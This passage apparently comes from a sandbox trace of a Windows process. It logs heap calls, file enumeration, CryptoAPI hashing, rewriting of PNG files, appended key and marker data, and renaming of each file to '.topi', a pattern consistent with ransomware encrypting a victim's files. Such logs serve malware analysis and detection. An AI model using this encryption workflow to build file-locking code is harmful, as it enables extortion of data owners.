dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.973] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.973] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0095.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.974] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.974] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.975] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\XhST2VyAgleTA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\xhst2vyagleta.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\XhST2VyAgleTA.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\xhst2vyagleta.png.topi")) returned 1 [0095.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.975] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.977] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.977] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6defed60, ftCreationTime.dwHighDateTime=0x1d5bd88, ftLastAccessTime.dwLowDateTime=0x9099d120, ftLastAccessTime.dwHighDateTime=0x1d5bda9, ftLastWriteTime.dwLowDateTime=0x9099d120, ftLastWriteTime.dwHighDateTime=0x1d5bda9, nFileSizeHigh=0x0, nFileSizeLow=0xdc7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zGQVw5ih.png", cAlternateFileName="")) returned 1 [0095.977] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\zGQVw5ih.png") returned=".png" [0095.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\zGQVw5ih.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\zgqvw5ih.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.977] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=56443) returned 1 [0095.977] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.981] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdc55, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.981] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.982] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.983] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.983] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.983] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.983] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.983] GetLastError () returned 0x0 [0095.983] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.983] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.983] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.983] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.983] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xdc80) returned 0x9a06a00 [0095.984] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2418 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2460 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.984] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0095.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9780 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9768 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.985] GetCurrentThreadId () returned 0x8c4 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f72f0 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.985] GetCurrentThreadId () returned 0x8c4 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9780 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9750 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.986] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9798 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e80 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9768 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9768 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.987] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.987] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9798 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9780 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9750 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f2460 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.988] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.989] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xdc76, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xdc76, lpOverlapped=0x0) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.989] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xdc7b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.989] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0095.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.989] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0095.989] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.989] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.989] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.990] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.990] CloseHandle (hObject=0x6a8) returned 1 [0095.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0095.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.996] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\zGQVw5ih.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\zgqvw5ih.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\zGQVw5ih.png.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\zgqvw5ih.png.topi")) returned 1 [0095.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.996] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.998] 